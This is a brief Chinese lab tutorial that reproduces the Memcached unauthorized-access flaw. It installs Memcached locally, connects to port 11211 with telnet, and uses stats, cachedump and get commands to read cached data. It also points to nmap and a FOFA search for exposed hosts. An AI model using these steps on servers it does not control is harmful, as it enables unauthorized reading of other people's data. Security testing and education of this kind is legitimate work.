Memcached未授权访问漏洞

Memcache能够提供临时数据存储服务，可以提高网站的整体性能，但由于memcache安全设计缺陷，默认开放的端口是11211，导致不需要密码就可以访问，攻击者可以直接连接服务器的11211端口获取数据库中的信息，导致信息泄露。

漏洞复现

步骤一:下载Memcached程序并执行以下命令---->启动Memcached漏洞环境

下载地址：
https://www.runoob.com/memcached/window-install-memcached.html
#执行命令
memcached.exe -d install
memcached.exe -d start

步骤二:使用Telnet程序探测目标的11211端口.

#Telnet探测
telnet 192.168.4.199 11211
#操作命令
stats //查看memcache服务状态
stats items //查看所有items
stats cachedump 390//获得缓存key
get:state:264861539228401373:261588//通过key读取相应value获得实际缓存内容，造
成敏感信息泄露

连接成功

步骤三：用nmap进行漏洞扫描

实例
用fofa语法 port="11211"搜索
连接成功